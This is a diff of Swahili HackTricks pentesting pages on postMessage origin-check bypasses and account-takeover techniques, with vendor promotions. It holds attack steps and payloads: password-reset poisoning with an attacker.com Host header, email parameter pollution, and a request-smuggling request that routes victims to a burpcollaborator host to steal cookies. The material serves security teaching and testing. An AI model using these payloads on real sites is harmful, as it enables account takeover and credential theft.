## Utekaji wa addEventListener
**`addEventListener`** ndio kazi hutumiwa na JS kutangaza kazi ambayo inatarajia `postMessages`.\
**`addEventListener`** ndio kazi hutumiwa na JS kutangaza kazi inayotarajia **kupokea `postMessages`**.\
Msimbo kama ufuatao utatumika:
```javascript
window.addEventListener("message", (event) => {
@ -92,38 +92,38 @@ return;
// ...
}, false);
```
Katika kesi hii, **jambo la kwanza** ambalo msimbo unafanya ni **kuangalia asili**. Hii ni muhimu sana hasa ikiwa ukurasa utafanya **kitu nyeti** na habari iliyopokelewa (kama kubadilisha nenosiri). **Ikiwa haitoiangalia asili, wachomaji wanaweza kufanya waathiriwa watume data ya kupendelea kwa vituo hivi** na kubadilisha nywila za waathiriwa (katika mfano huu).
Katika kesi hii, **jambo la kwanza** ambalo msimbo unafanya ni **kuangalia asili**. Hii ni muhimu sana hasa ikiwa ukurasa utafanya **kitu nyeti** na habari iliyopokelewa (kama kubadilisha nenosiri). **Ikiwa haitoiangalia asili, wachomaji wanaweza kufanya waathiriwa watume data ya kupangwa kwa hii maeneo** na kubadilisha nywila za waathiriwa (katika mfano huu).
### Uchambuzi
Kwa lengo la **kupata wasikilizaji wa tukio** kwenye ukurasa wa sasa unaweza:
* **Tafuta** msimbo wa JS kwa `window.addEventListener` na `$(window).on` (_toleo la JQuery_)
* **Tekeleza** kwenye kikasha cha zana cha watengenezaji: `getEventListeners(window)`
* **Tekeleza** kwenye konsoli ya zana ya developer: `getEventListeners(window)`
![](<../../.gitbook/assets/image (618) (1).png>)
* **Nenda** _Elements --> Wasikilizaji wa Tukio_ katika zana za watengenezaji wa kivinjari
* **Nenda** _Elements --> Wasikilizaji wa Tukio_ katika zana za developer ya kivinjari
![](<../../.gitbook/assets/image (393).png>)
* Tumia **kifaa cha kivinjari** kama [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) au [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). Vifaa hivi vya kivinjari vitakapo **kukamata ujumbe wote** na kuwaonyesha.
### Pita kuthibitisha asili
### Pita kwenye ukaguzi wa Asili
* Sifa ya **`event.isTrusted`** inachukuliwa kuwa salama kwani inarudisha `True` tu kwa matukio yaliyotengenezwa na hatua halisi za mtumiaji. Ingawa ni changamoto kuihepa ikiwa imefanywa kwa usahihi, umuhimu wake katika ukaguzi wa usalama ni muhimu.
* Matumizi ya **`indexOf()`** kwa uthibitisho wa asili katika matukio ya PostMessage yanaweza kuwa rahisi kuihepa. Mfano unaoonyesha udhaifu huu ni:
* Sifa ya **`event.isTrusted`** inachukuliwa kuwa salama kwani inarudisha `True` tu kwa matukio yaliyozalishwa na vitendo halisi vya mtumiaji. Ingawa ni changamoto kuihepa ikiwa imefanywa kwa usahihi, umuhimu wake katika ukaguzi wa usalama ni muhimu.
* Matumizi ya **`indexOf()`** kwa ukaguzi wa asili katika matukio ya PostMessage yanaweza kuwa rahisi kuihepa. Mfano unaoonyesha udhaifu huu ni:
```javascript
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
```
* Mbinu ya **`search()`** kutoka `String.prototype.search()` inalenga kwa mizani ya kawaida, sio maneno. Kupitisha kitu kingine isipokuwa regexp husababisha ubadilishaji wa lazima kuwa regex, hivyo kufanya mbinu kuwa hatarini. Hii ni kwa sababu katika regex, kipande (.) hufanya kama kichwa, kuruhusu kuihepa uthibitisho na uwanja ulioandaliwa kwa ustadi. Kwa mfano:
* Mbinu ya **`search()`** kutoka `String.prototype.search()` inalenga katika taratibu za kawaida, sio maneno. Kupitisha kitu kingine isipokuwa taratibu za kawaida kunapelekea uongofu wa lazima kuwa taratibu za kawaida, hivyo kufanya mbinu kuwa na hatari. Hii ni kwa sababu katika taratibu za kawaida, kipande (.) hufanya kama kichujio, kuruhusu kuihepa uthibitisho na uwanja ulioandaliwa kwa makini. Kwa mfano:
```javascript
"https://www.safedomain.com".search("www.s.fedomain.com")
```
* Kazi ya **`match()`**, kama `search()`, inashughulikia regex. Ikiwa regex haijajengwa kwa usahihi, inaweza kuwa rahisi kuihepa.
* Kazi ya **`escapeHtml`** inalenga kusafisha vipande kwa kutoroka wahusika. Hata hivyo, haifanyi kitu kipya kilichotoroka bali inabadilisha mali za kitu kilichopo. Tabia hii inaweza kutumika vibaya. Hasa, ikiwa kitu kinaweza kubadilishwa ili mali yake inayodhibitiwa isikubali `hasOwnProperty`, `escapeHtml` haitafanya kama ilivyotarajiwa. Hii inaonyeshwa katika mifano hapa chini:
* Kazi ya **`match()`**, kama `search()`, inashughulikia taratibu za kawaida. Ikiwa taratibu za kawaida hazijajengwa kwa usahihi, inaweza kuwa rahisi kuihepa.
* Kazi ya **`escapeHtml`** inalenga kusafisha vipande kwa kutoroka wahusika. Hata hivyo, haifanyi kitu kipya cha kutoroka bali inabadilisha mali za kitu kilichopo. Tabia hii inaweza kutumika vibaya. Hasa, ikiwa kitu kinaweza kubadilishwa ili mali yake iliyodhibitiwa isikubali `hasOwnProperty`, `escapeHtml` haitafanya kama ilivyotarajiwa. Hii inaonyeshwa katika mifano hapa chini:
* Kukosekana kwa Matarajio:
@ -142,13 +142,13 @@ result.message; // "'"<b>\"
Katika muktadha wa udhaifu huu, kitu cha `File` kinafaa kutumiwa kwa sababu ya mali yake ya kusoma tu ya `name`. Mali hii, inapotumiwa katika templeti, haifanyi safishwa na kazi ya `escapeHtml`, ikiongoza kwa hatari za usalama.
* Mali ya `document.domain` katika JavaScript inaweza kuwekwa na hati ya kufupisha uwanja, kuruhusu utekelezaji wa sera sawa ya asili ndani ya uwanja wa mzazi mmoja.
* Mali ya `document.domain` katika JavaScript inaweza kuwekwa na skripti ili kupunguza kikoa, kuruhusu utekelezaji wa sera sawa ya asili ndani ya kikoa kimoja cha mzazi.
### Kuihepa e.origin == window.origin
Wakati wa kuingiza ukurasa wa wavuti ndani ya **iframe iliyofungwa** kwa kutumia %%%%%%, ni muhimu kuelewa kuwa asili ya iframe itawekwa kwa null. Hii ni muhimu hasa unaposhughulika na **vipengele vya sanduku** na matokeo yake kwa usalama na utendaji.
Wakati wa kuingiza ukurasa wa wavuti ndani ya **sandboxed iframe** kwa kutumia %%%%%%, ni muhimu kuelewa kuwa asili ya iframe itawekwa kwa null. Hii ni muhimu hasa unaposhughulika na **vipengele vya sandbox** na matokeo yake kwa usalama na utendaji.
Kwa kufafanua **`ruhusu-popups`** katika kipengele cha sanduku, dirisha lolote la popup lililofunguliwa kutoka ndani ya iframe linarithi vikwazo vya sanduku vya mzazi wake. Hii inamaanisha kwamba isipokuwa **kipengele cha `ruhusu-popups-to-escape-sandbox`** pia kimejumuishwa, asili ya dirisha la popup pia inawekwa kwa `null`, ikilinganisha na asili ya iframe.
Kwa kufafanua **`allow-popups`** katika kipengele cha sandbox, dirisha lolote la popup lililofunguliwa kutoka ndani ya iframe linarithi vikwazo vya sandbox ya mzazi wake. Hii inamaanisha kwamba isipokuwa **`allow-popups-to-escape-sandbox`** pia imejumuishwa, asili ya dirisha la popup pia inawekwa kwa `null`, ikilinganisha na asili ya iframe.
Kufuatia hivyo, wakati popup inapofunguliwa chini ya hali hizi na ujumbe unatumwa kutoka kwa iframe kwenda kwa popup kwa kutumia **`postMessage`**, pande zote za kutuma na kupokea zina asili zao zimewekwa kwa `null`. Hali hii inapelekea kwa hali ambapo **`e.origin == window.origin`** inathibitisha kuwa kweli (`null == null`), kwa sababu iframe na popup zote zina thamani sawa ya asili ya `null`.
@ -160,7 +160,7 @@ Kwa habari zaidi **soma**:
### Kuihepa e.source
Inawezekana kuthibitisha ikiwa ujumbe umetoka kwenye dirisha sawa ambalo skripti inasikiliza (hasa ya kuvutia kwa **Vifaa vya Skripti za Yaliyomo kutoka kwa vifaa vya kivinjari** kuthibitisha ikiwa ujumbe ulitumwa kutoka kwenye ukurasa sawa):
Inawezekana kuchunguza ikiwa ujumbe umetoka kwenye dirisha sawa ambalo skripti inasikiliza (hasa ya kuvutia kwa **Vifaa vya Skripti za Yaliyomo kutoka kwa vifaa vya kivinjari** ili kuhakikisha ikiwa ujumbe ulitumwa kutoka kwenye ukurasa sawa):
```javascript
// If its not, return immediately.
if( received_message.source !== window ) {
@ -177,8 +177,8 @@ Kwa maelezo zaidi **soma:**
### Kizuizi cha Kichwa cha X-Frame
Ili kutekeleza mashambulizi haya kwa ufanisi unaweza **kuweka ukurasa wa mwathiriwa** ndani ya `iframe`. Lakini baadhi ya vichwa kama `X-Frame-Header` vinaweza **kuzuia** hilo.\
Katika hali hizo, bado unaweza kutumia shambulizi lisilo la siri. Unaweza kufungua kichupo kipya kwa programu ya wavuti yenye kasoro na kuwasiliana nayo:
Ili kutekeleza mashambulizi haya kwa ufanisi, unaweza **kuweka ukurasa wa mwathiriwa** ndani ya `iframe`. Lakini baadhi ya vichwa kama `X-Frame-Header` vinaweza **kuzuia** hilo.\
Katika hali hizo, bado unaweza kutumia shambulizi lisilo la siri. Unaweza kufungua kichupo kipya kwa programu-jalizi ya wavuti yenye kasoro na kuwasiliana nayo:
```markup
<script>
var w=window.open("<url>")
@ -195,7 +195,7 @@ Katika ukurasa ufuatao unaweza kuona jinsi unavyoweza kuiba **data nyeti ya post
### Kuiba ujumbe kwa kubadilisha mahali pa iframe
Ikiwa unaweza kuweka iframe kwenye ukurasa bila X-Frame-Header ambao una iframe nyingine, unaweza **kubadilisha mahali pa iframe ya mtoto**, hivyo ikiwa inapokea **postmessage** iliyotumwa kwa **alama ya asterisk**, mshambuliaji anaweza **kubadilisha** asili ya iframe hiyo kwenda kwenye ukurasa **anaodhibiti** na **kuiba** ujumbe:
Ikiwa unaweza kuweka iframe kwenye ukurasa bila Kichwa cha X-Frame kinachohitajika ambacho kina iframe nyingine, unaweza **kubadilisha mahali pa ile iframe ya mtoto**, hivyo ikiwa inapokea **postmessage** iliyotumwa kwa **alama ya joker**, mshambuliaji anaweza **kubadilisha** asili ya iframe hiyo kwenda kwenye ukurasa **unaodhibitiwa** na yeye na **kuiba** ujumbe huo:
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
@ -235,13 +235,13 @@ Kwa **maelezo zaidi**:
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
* Kwa mazoezi: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -249,7 +249,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -257,6 +257,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -6,17 +6,17 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na **malware za kuiba**.
@ -32,7 +32,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
### Usajili wa Kulinganisha
* Jaribu kujaribu kutumia jina la mtumiaji lililopo
* Jaribu kuzalisha kwa kutumia jina la mtumiaji lililopo
* Angalia kwa kubadilisha barua pepe:
* herufi kubwa
* \+1@
@ -49,11 +49,11 @@ Angalia ikiwa unaweza kugundua wakati jina la mtumiaji tayari limeandikishwa nda
### Sera ya Nenosiri
Kuunda mtumiaji angalia sera ya nenosiri (angalia ikiwa unaweza kutumia nywila dhaifu).\
Katika kesi hiyo unaweza kujaribu kudukua maelezo ya kuingia.
Katika kesi hiyo unaweza kujaribu kuvunja nguvu za siri.
### Udukuzi wa SQL
[**Angalia ukurasa huu** ](sql-injection/#insert-statement)ili kujifunza jinsi ya kujaribu udhibiti wa akaunti au kutoa taarifa kupitia **SQL Injections** kwenye fomu za usajili.
[**Angalia ukurasa huu** ](sql-injection/#insert-statement)ili kujifunza jinsi ya kujaribu kudhibiti akaunti au kutoa taarifa kupitia **SQL Injections** kwenye fomu za usajili.
### Udukuzi wa Oauth
@ -61,7 +61,7 @@ Katika kesi hiyo unaweza kujaribu kudukua maelezo ya kuingia.
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}
### Mapungufu ya SAML
### Udhaifu wa SAML
{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
@ -75,29 +75,8 @@ Baada ya kusajili jaribu kubadilisha barua pepe na angalia ikiwa mabadiliko haya
* Angalia ikiwa unaweza kutumia **barua pepe za kutumika mara moja**
* **Nenosiri ndefu** (>200) husababisha **DoS**
* **Angalia mipaka ya kiwango cha uundaji wa akaunti**
* **Angalia mipaka ya viwango vya uundaji wa akaunti**
* Tumia username@**burp\_collab**.net na uchambue **kurudi kwa wito**
## **Udhibiti wa Rudisha Nenosiri**
### Kuvuja kwa Alama ya Rudisha Nenosiri Kupitia Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. Omba kurejesha nenosiri kwa anwani yako ya barua pepe
2. Bonyeza kiungo cha kurejesha nenosiri
3. Usibadilishe nenosiri
4. Bonyeza tovuti za tatu (k.m: Facebook, twitter)
5. Kukamata ombi katika proksi ya Burp Suite
6. Angalia ikiwa kichwa cha referrer kinavuja nenosiri la kurejesha nenosiri.
### Sumu ya Rudisha Nenosiri <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
1. Kukamata ombi la kurejesha nenosiri katika Burp Suite
2. Ongeza au hariri vichwa vifuatavyo katika Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Wasilisha ombi lenye kichwa kilichobadilishwa\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Tafuta URL ya kurejesha nenosiri kulingana na _kichwa cha mwenyeji_ kama: `https://attacker.com/reset-password.php?token=TOKEN`
### Rudisha Nenosiri Kupitia Parameta ya Barua pepe <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
@ -119,29 +98,29 @@ email=victim@mail.com|hacker@mail.com
1. Mshambuliaji lazima aingie kwenye akaunti yao na kwenda kwenye kipengele cha **Badilisha nenosiri**.
2. Anza Burp Suite na Kukamata ombi
3. Tuma kwenye kichupo cha kurudia na urekebishe vigezo: Kitambulisho cha Mtumiaji/barua pepe\
`powershell POST /api/changepass [...] ("fomu": {"barua pepe":"mwathirika@email.com","nenosiri":"nenosiri salama"})`
`powershell POST /api/changepass [...] ("fomu": {"barua pepe":"mwathiriwa@email.com","nenosiri":"salama"})`
### Kitufe Dhaifu cha Kurejesha Nenosiri <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
Kitufe cha kurejesha nenosiri kinapaswa kuundwa kwa nasibu na kuwa tofauti kila wakati.\
Jaribu kubaini ikiwa kitufe hicho kina muda wa kumalizika au ikiwa ni sawa kila wakati, kwa baadhi ya matukio, algorithmu ya uundaji ni dhaifu na inaweza kubashiriwa. Vigezo vifuatavyo vinaweza kutumiwa na algorithmu.
Jaribu kubaini ikiwa kitufe hicho kinaisha au ikiwa ni sawa kila wakati, katika baadhi ya matukio algorithmu ya uundaji ni dhaifu na inaweza kudhaniwa. Viwango vifuatavyo vinaweza kutumiwa na algorithmu.
* Muda wa saa
* Muda wa Mwisho
* Kitambulisho cha Mtumiaji
* Barua pepe ya Mtumiaji
* Jina la Kwanza na la Mwisho
* Tarehe ya Kuzaliwa
* Kriptografia
* Nambari pekee
* Mfuatano mdogo wa kitufe (herufi kati ya \[A-Z,a-z,0-9])
* Utumiaji wa kitufe
* Tarehe ya muda wa kitufe kumalizika
* Mfululizo mdogo wa kitufe (herufi kati ya \[A-Z,a-z,0-9])
* Kutumia tena kitufe
* Tarehe ya Mwisho ya Kupita Kitufe
### Kuvuja kwa Kitufe cha Kurejesha Nenosiri <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
1. Chochote ombi la kurejesha nenosiri kwa kutumia API/UI kwa barua pepe fulani kama vile: test@mail.com
2. Angalia majibu ya seva na tafuta `resetToken`
3. Kisha tumia kitufe kwenye URL kama `https://mfano.com/v3/mtumiaji/nenosiri/rejesha?resetToken=[KITUFU_CHA_KUREJESHA]&barua pepe=[BARUA_PEPE]`
3. Kisha tumia kitufe kwenye URL kama `https://mfano.com/v3/mtumiaji/nenosiri/rejesha?resetToken=[KITAMBULISHO_CHA_KUREJESHA]&barua pepe=[BARUA_PEPE]`
### Kurejesha Nenosiri Kupitia Mgongano wa Jina la Mtumiaji <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
@ -156,7 +135,7 @@ Angalia: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### Kuchukua Udhibiti wa Akaunti Kupitia Udukuzi wa Tovuti ya Msalaba <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
1. Tafuta XSS ndani ya programu au kikoa ikiwa vidakuzi vimeelekezwa kwa kikoa cha mzazi: `*.domain.com`
2. Vujisha **kuki za kikao za sasa**
2. Vujisha **kuki za kikao cha sasa**
3. Thibitisha kama mtumiaji kwa kutumia kuki
### Kuchukua Udhibiti wa Akaunti Kupitia Udukuzi wa Ombi la HTTP <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
@ -164,7 +143,7 @@ Angalia: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
1. Tumia **smuggler** kugundua aina ya Udukuzi wa Ombi la HTTP (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2. Unda ombi litakalobadilisha `POST / HTTP/1.1` na data ifuatayo:\
`GET http://kitu.burpcollaborator.net HTTP/1.1 X:` kwa lengo la kuhamisha waathiriwa kwenye burpcollab na kuiba kuki zao\
`GET http://kitu.burpcollaborator.net HTTP/1.1 X:` kwa lengo la kuhamisha waathiriwa kwenye burpcollab na kuiba vidakuzi vyao\
3. Ombi la mwisho linaweza kuonekana kama ifuatavyo
```
GET / HTTP/1.1
@ -177,20 +156,20 @@ Content-Length: 83
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone ripoti za kutumia kosa hili\
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
### Ripoti za Hackerone zinazoexploit bug hii\
* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
### Kuchukua Udhibiti wa Akaunti kupitia CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
1. Unda mzigo wa CSRF, k.m: "Fomu ya HTML na utoaji wa moja kwa moja kwa mabadiliko ya nenosiri"
2. Tuma mzigo
1. Unda payload kwa CSRF, kwa mfano: "Fomu ya HTML na auto submit kwa mabadiliko ya nenosiri"
2. Tuma payload
### Kuchukua Udhibiti wa Akaunti kupitia JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
Tokeni ya JSON Web inaweza kutumika kuthibitisha mtumiaji.
JSON Web Token inaweza kutumika kuthibitisha mtumiaji.
* Hariri JWT na Kitambulisho cha Mtumiaji / Barua pepe nyingine
* Hariri JWT na User ID / Barua pepe nyingine
* Angalia saini dhaifu ya JWT
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
@ -202,13 +181,13 @@ Tokeni ya JSON Web inaweza kutumika kuthibitisha mtumiaji.
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa utendaji wa **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na kuchukua akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya wizi wa habari.
Lengo kuu la WhiteIntel ni kupambana na kuchukua udhibiti wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
@ -217,7 +196,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -225,6 +204,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -2,23 +2,23 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikionyeshwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -28,24 +28,24 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
## Taarifa Msingi
Lugha ya Uelekezaji (EL) ni muhimu katika JavaEE kwa kuhusisha safu ya uwasilishaji (k.m., kurasa za wavuti) na mantiki ya programu (k.m., mabano yaliyosimamiwa), kuruhusu mwingiliano wao. Inatumika sana katika:
Lugha ya Uelekezaji (EL) ni muhimu katika JavaEE kwa kuhusisha safu ya uwasilishaji (k.m., kurasa za wavuti) na mantiki ya programu (k.m., mabano yaliyosimamiwa), kuruhusu mwingiliano wao. Mara nyingi hutumiwa katika:
